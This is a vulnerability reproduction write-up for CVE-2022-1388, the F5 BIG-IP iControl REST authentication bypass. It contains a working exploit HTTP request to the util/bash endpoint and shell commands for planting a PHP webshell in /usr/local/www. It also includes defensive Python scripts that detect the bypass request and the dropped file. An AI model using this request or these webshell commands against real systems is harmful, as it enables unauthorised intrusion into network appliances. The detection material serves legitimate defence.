毅种循环

CVE-2022-1388 F5 BIG-IP Unauthenticated RCE Vulnerability & Writing Webshell

Vulnerability Description

F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions: undisclosed requests may bypass iControl REST authentication. Note: software versions that have reached End of Technical Support (EoTS) were not evaluated.

Reproduction Process

The HTTP request package is as follows:

POST /mgmt/tm/util/bash HTTP/1.1
Host: xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type: application/json

{
"command":"run",
"utilCmdArgs":"-c id"
}
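From the defender's side, the request above has a distinctive shape: a Connection header that names X-F5-Auth-Token as a hop-by-hop header, an X-F5-Auth-Token header sent alongside Basic Authorization, a Basic credential whose password part is empty, and a POST to the util/bash endpoint. The following script is an added example (not code from the original post or from the linked exploit) that parses raw HTTP request text, as a proxy or WAF log would hand it over, and reports which of those indicators are present. The sample requests, the Host value and the session token string are constructed.

```python
"""Flag CVE-2022-1388-style iControl REST authentication bypass requests.

Added example, not code from the original post. It parses raw HTTP request
text and reports the indicators visible in the request above. All sample
requests below are constructed; only the endpoint and header names come
from the post.
"""
import base64
from typing import Dict, List, Optional, Tuple

ICONTROL_PREFIX = "/mgmt/"             # iControl REST lives under this prefix
SHELL_ENDPOINT = "/mgmt/tm/util/bash"  # endpoint used in the request above


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased and values stripped; CRLF and LF line
    endings are both accepted. The body is everything after the first
    blank line (empty if there is none).
    """
    text = raw.replace("\r\n", "\n").lstrip("\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate junk lines; a strict parser would reject them
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def basic_credentials(headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Decode 'Authorization: Basic ...' into (user, password), else None."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth[6:].strip(), validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    user, _, password = decoded.decode("utf-8", "replace").partition(":")
    return user, password


def bypass_indicators(raw: str) -> List[str]:
    """Return the CVE-2022-1388 indicators present in one request (empty = none)."""
    method, path, headers, _body = parse_request(raw)
    findings: List[str] = []
    if not path.startswith(ICONTROL_PREFIX):
        return findings             # not an iControl REST request at all

    # Connection tokens are comma-separated and case-insensitive (RFC 7230).
    conn_tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in conn_tokens:
        findings.append("Connection header lists X-F5-Auth-Token as hop-by-hop")
    if "x-f5-auth-token" in headers and "authorization" in headers:
        findings.append("X-F5-Auth-Token and Authorization sent together")
    creds = basic_credentials(headers)
    if creds is not None and creds[1] == "":
        findings.append(f"Basic credential with empty password for user {creds[0]!r}")
    if method == "POST" and path == SHELL_ENDPOINT:
        findings.append("POST to the util/bash command-execution endpoint")
    return findings


# Constructed sample: the shape of the request shown above (Host is a placeholder).
SUSPICIOUS_REQUEST = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\n"
    "X-F5-Auth-Token: anything\r\n"
    "Authorization: Basic YWRtaW46\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"command":"run","utilCmdArgs":"-c id"}'
)

# Constructed sample: an ordinary token-authenticated API read.
BENIGN_REQUEST = (
    "GET /mgmt/tm/sys/version HTTP/1.1\r\n"
    "Host: bigip.example\r\n"
    "Connection: keep-alive\r\n"
    "X-F5-Auth-Token: CONSTRUCTED-SESSION-TOKEN\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("suspicious", SUSPICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        hits = bypass_indicators(req)
        print(f"{label}: {len(hits)} indicator(s)")
        for hit in hits:
            print("  -", hit)
```

Any single indicator can occur in legitimate traffic (a token plus Basic header, for instance), so treat the count as a score: the request on this page trips all four, while the constructed benign request trips none. Feeding every request for /mgmt/ through this check from a front-end log is enough to spot the bypass attempt regardless of which command is carried in utilCmdArgs.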


EXP/POC

CVE-2022-1388-EXP-main.zip

Webshell Writing

A reverse shell is obtained.

Writing a webshell follows the same approach as for the earlier F5 BIG-IP vulnerability CVE-2020-5902.
The write path is /usr/local/www:

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr
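The three commands above leave two traces on the box: /usr is briefly remounted read-write, and a new PHP file appears under /usr/local/www. The following script is an added example (not code from the original post) showing how a responder would check both: it parses /proc/mounts text to tell whether /usr is still read-only, and diffs a listing of the web root against a known-good baseline, flagging additions that contain a PHP open tag. The mount table, the baseline and the file listing below are constructed; only the /usr/local/www path and the test.php content come from the post.

```python
"""Check the two things the webshell write above changes on the host.

Added example, not code from the original post. (1) Parse /proc/mounts to
see whether /usr is mounted read-only; (2) diff the web root against a
baseline and report new files that contain a PHP open tag. The mount
table, baseline and listing are constructed sample data.
"""
import os
import re
from typing import Dict, List, Optional, Set

WEB_ROOT = "/usr/local/www"                      # write path named in the post
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


def usr_is_readonly(proc_mounts: str) -> Optional[bool]:
    """True if /usr is mounted 'ro', False if 'rw', None if not a separate mount.

    /proc/mounts lines are: device mountpoint fstype options dump pass.
    """
    for line in proc_mounts.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == "/usr":
            return "ro" in fields[3].split(",")
    return None


def unexpected_files(current: Set[str], baseline: Set[str]) -> List[str]:
    """Paths present now but absent from the baseline, sorted for stable output."""
    return sorted(current - baseline)


def php_files(contents: Dict[str, str], paths: List[str]) -> List[str]:
    """Subset of paths whose content contains a PHP open tag."""
    return [p for p in paths if PHP_TAG.search(contents.get(p, ""))]


def list_web_root(root: str = WEB_ROOT) -> Set[str]:
    """Relative paths of every regular file under root (for use on a live host)."""
    found: Set[str] = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            found.add(os.path.relpath(os.path.join(dirpath, name), root))
    return found


def audit(proc_mounts: str, current: Set[str], baseline: Set[str],
          contents: Dict[str, str]) -> Dict[str, object]:
    """Combine both checks into one report."""
    new = unexpected_files(current, baseline)
    return {
        "usr_readonly": usr_is_readonly(proc_mounts),
        "new_files": new,
        "new_php_files": php_files(contents, new),
    }


# Constructed mount tables: while /usr is remounted rw, and after restoring ro.
MOUNTS_RW = "/dev/sda1 / ext4 rw,relatime 0 0\n/dev/sda2 /usr ext4 rw,relatime 0 0\n"
MOUNTS_RO = "/dev/sda1 / ext4 rw,relatime 0 0\n/dev/sda2 /usr ext4 ro,relatime 0 0\n"

# Constructed baseline and current listing of the web root.
BASELINE = {"index.html", "css/site.css"}
CURRENT = {"index.html", "css/site.css", "test.php"}
CONTENTS = {"test.php": "<?php phpinfo();?> \n"}

if __name__ == "__main__":
    print(audit(MOUNTS_RW, CURRENT, BASELINE, CONTENTS))
```

On a real host, replace the constructed data with `open("/proc/mounts").read()`, `list_web_root()` and a baseline taken from a clean image; the baseline diff is what catches the dropped file even after the attacker has restored the read-only mount.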

Access path: the written test.php can then be requested over HTTP.

References

F5 BIG-IP Remote Code Execution Vulnerability Reproduction (CVE-2020-5902)

CVE-2020-5902: F5 BIG-IP RCE Analysis and Research
